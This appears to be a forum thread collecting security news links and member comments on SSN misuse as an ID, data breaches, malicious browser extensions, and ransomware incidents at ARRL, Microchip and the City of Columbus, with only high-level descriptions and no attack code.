It's time to stop using SSNs as personal ID.

https://www.bleepingcomputer.com/ne...on-data-records-with-social-security-numbers/

 

It's time to stop using SSNs as personal ID.

https://www.bleepingcomputer.com/ne...on-data-records-with-social-security-numbers/

This is what my original card looked like.

I got mine as a kid, when anyone could complete the form with any name they wanted and get the card in the mail. No ID needed. They have never been secure.

It was also used as your military service number in the 70's so it was never secure during that time frame for VETs.
https://www.archives.gov/personnel-records-center/social-security-numbers

 

It's time to stop using SSNs as personal ID.

https://www.bleepingcomputer.com/ne...on-data-records-with-social-security-numbers/

This is something that is coming full circle.

When I was a kid, your SSN wasn't used for anything except what it was supposed to be used for. Join a club? They assigned you a member ID. Become a student? They assigned you a student ID. Join the military? They assigned you a service ID. I think a big part of the reason for this was that many people didn't get a SSN until they absolutely had to, usually when they got their first job that withheld FICA taxes. Filing taxes? You might need an SS number, depending on the specifics. Claiming dependents on your taxes? No need for the dependents to have an SSN, so no reason for parents to get them on. I got mine in third grade, but only because a friend and I found out that we COULD get one, and so one summer day we bicycled down to the post office, about three miles a way, and filled out the application. So organizations couldn't assume that new members would have an SSN, let alone anything else that could serve as a reasonably-certain unique ID number. SS cards have always said (at least my first one that I got issued in the early 1970s, and which I still have) that the card (and, by inference, the number) was not to be used for any other purpose. But then the federal government decided that you couldn't claim kids as a dependent unless they had an SSN, so of course parents got their kids SSNs. Now, organizations had a pretty reliable way to assign a unique number to new members and, let's admit it, it was damn convenient for the members to only have a single number that served as their ID number for most of the organizations they were members of or had associations with. Even the military used your SSN as your service number. It got to the point that when you wrote a check, they wanted both your driver's license number and your SSN written on the check to give them a better ability of seeking recourse if the check bounced. In fact, for a number of years, I had my checks preprinted with my DLN and SSN to save the hassle.

Fast forward, and we get to the point that so many people are using the SSN as an ID number of one kind or another for so many organizations, that knowing someone's SSN is a prime way to pry the lid off of their personal accounts for all kinds of illegal activities and getting their SSN is trivially easy. So the federal government makes it illegal for organizations to use your SSN as membership IDs or to publish them in any except closely held and confidential documents. But, of course, they exempted themselves from those requirements, giving the government an extra decade or so to come into compliance with the rules it was forcing everyone else to adopt in just a couple of years.

 

Why is a browser extension allowed to modify the OS (or do anything outside the context of the browser)?

https://www.tomsguide.com/computing...-that-steal-your-personal-data-what-to-do-now

The hackers behind it have created lookalike sites that impersonate popular software and services like Roblox FPS Unlocker, YouTube, VLC media player, Steam or Keepass. While potential victims think they’re installing legitimate software or extensions, they’re actually downloading a trojan that installs the malicious extensions used by this malware.

The digitally signed malicious installers used in this campaign register a scheduled task on vulnerable PCs that then executes a PowerShell script which downloads and executes the next-stage payload from a hacker-controlled remote server.

 

https://www.nist.gov/news-events/ne...3-finalized-post-quantum-encryption-standards
NIST Releases First 3 Finalized Post-Quantum Encryption Standards

 

https://www.theregister.com/2024/08/13/j_p_morgan_suspect_indicted_charged/

 

https://cybersecuritynews.com/0-click-rce-windows-tcp-ip/amp/

I haven't gotten the update for my Win XP installation yet.

 

 

Hackers Hack Milking Robots, Demand Ransom, One Cow Dies


​

The person concerned then calls the manufacturer of the system and is put in touch with an IT specialist, who reveals: “You have been hacked.” All the robot’s data has been encrypted: the only reason why the cows can still be milked is that some parts of the system are disconnected from the computer.

 

https://therecord.media/china-linked-hackers-russia-state-agency-attacks

China-linked hackers could be behind cyberattacks on Russian state agencies, researchers say

Hackers have targeted dozens of computers belonging to Russian state agencies and tech companies with malicious tools linked to Chinese threat actors, according to a new report.
In a campaign dubbed EastWind discovered late last month by researchers at Russian cybersecurity firm Kaspersky, the attackers used the GrewApacha remote access trojan (RAT), an unknown PlugY backdoor and an updated version of CloudSorcerer malware, which was previously used to spy on Russian organizations.

 

https://cybersecuritynews.com/0-click-rce-windows-tcp-ip/amp/

I haven't gotten the update for my Win XP installation yet.

Another reason to turn off the IPV6 stack/protocol in Windows (device manager, network adapter).
Joey is lucky that XP didn't have IPV6.

 

https://krebsonsecurity.com/2024/08/national-public-data-published-its-own-passwords/

 

https://www.theregister.com/AMP/2024/08/20/flightaware_data_exposure/

 

https://krebsonsecurity.com/2024/08/national-public-data-published-its-own-passwords/

It's completely naive to think that these things won't continue to happen. There are just too many places that have access to too much data to ever hope that every single one of them is going to be secure, particularly when so many of those sites routinely farm out major portions of their activities (and responsibilities) to third parties based on who is the lowest bidder. Sometimes that lowest bidder is the lowest bidder precisely because what they want is not the contract to make a profit on the job, but access to the data that the contract affords.

The most relevant part of the article, in my opinion, was this:

The point is, if you’re an American who hasn’t frozen their credit files and you haven’t yet experienced some form of new account fraud, the ID thieves probably just haven’t gotten around to you yet.

The article also point out something that I was aware of, but completely forget, is that we (Americans) are now entitled to a free credit report from each of the three credit bureaus every week, instead of just annually.

 

 

https://www.reuters.com/technology/...rm-halliburton-hit-by-cyberattack-2024-08-21/
Top US oilfield firm Halliburton hit by cyberattack, source says

 

https://www.yahoo.com/news/potential-cyberattack-impacts-port-seattle-211400390.html
Potential cyberattack impacts Port of Seattle online systems, including SEA Airport

 

https://www.arrl.org/news/arrl-it-security-incident-report-to-members
ARRL IT Security Incident - Report to Members

Sometime in early May 2024, ARRL’s systems network was compromised by threat actors (TAs) using information they had purchased on the dark web. The TAs accessed headquarters on-site systems and most cloud-based systems. They used a wide variety of payloads affecting everything from desktops and laptops to Windows-based and Linux-based servers. Despite the wide variety of target configurations, the TAs seemed to have a payload that would host and execute encryption or deletion of network-based IT assets, as well as launch demands for a ransom payment, for every system.

This serious incident was an act of organized crime. The highly coordinated and executed attack took place during the early morning hours of May 15. That morning, as staff arrived, it was immediately apparent that ARRL had become the victim of an extensive and sophisticated ransomware attack. The FBI categorized the attack as “unique” as they had not seen this level of sophistication among the many other attacks, they have experience with. Within 3 hours a crisis management team had been constructed of ARRL management, an outside vendor with extensive resources and experience in the ransomware recovery space, attorneys experienced with managing the legal aspects of the attack including interfacing with the authorities, and our insurance carrier. The authorities were contacted immediately as was the ARRL President.

It was also clear that they believed ARRL had extensive insurance coverage that would cover a multi-million-dollar ransom payment. After days of tense negotiation and brinkmanship, ARRL agreed to pay a $1 million ransom. That payment, along with the cost of restoration, has been largely covered by our insurance policy.

 

https://www.securityweek.com/ransomware-gang-leaks-data-allegedly-stolen-from-microchip-technology/

Ransomware Gang Leaks Data Allegedly Stolen From Microchip Technology
The Play ransomware group has published gigabytes of data allegedly stolen from US semiconductor supplier Microchip Technology.

We are aware of claims made by a third party relating to the recent IT disruption we disclosed. We take this issue very seriously and have notified law enforcement. Microchip continues to work diligently on our investigation and remediation efforts with the assistance of our external cybersecurity advisors.

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a
Play Ransomware

The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.

 

https://arstechnica.com/security/20...r-he-discloses-severity-of-ransomware-attack/
City of Columbus sues man after he discloses severity of ransomware attack
Mayor said data was unusable to criminals; researcher proved otherwise.

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross alerting reporters to the information, which ii claimed would not be easily obtained by others.


“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The Mayor is IMO being made a fool by someone in government with their job on the line for the data loss.

It's easy to see the data is in a SQL database format like you would expect. It's not corrupted, it's just a DB file.
https://www.nbc4i.com/news/investig...affects-residents-and-what-has-been-released/

“This is Microsoft SQL Server. So anyone can download this,” Goodwolf said. “There’s been multiple versions throughout the years. Some of those databases can only be restored on very specific versions from like 2012. This one’s asking about 2022 and some of the databases can be restored to that one. Each version has its own backup format.”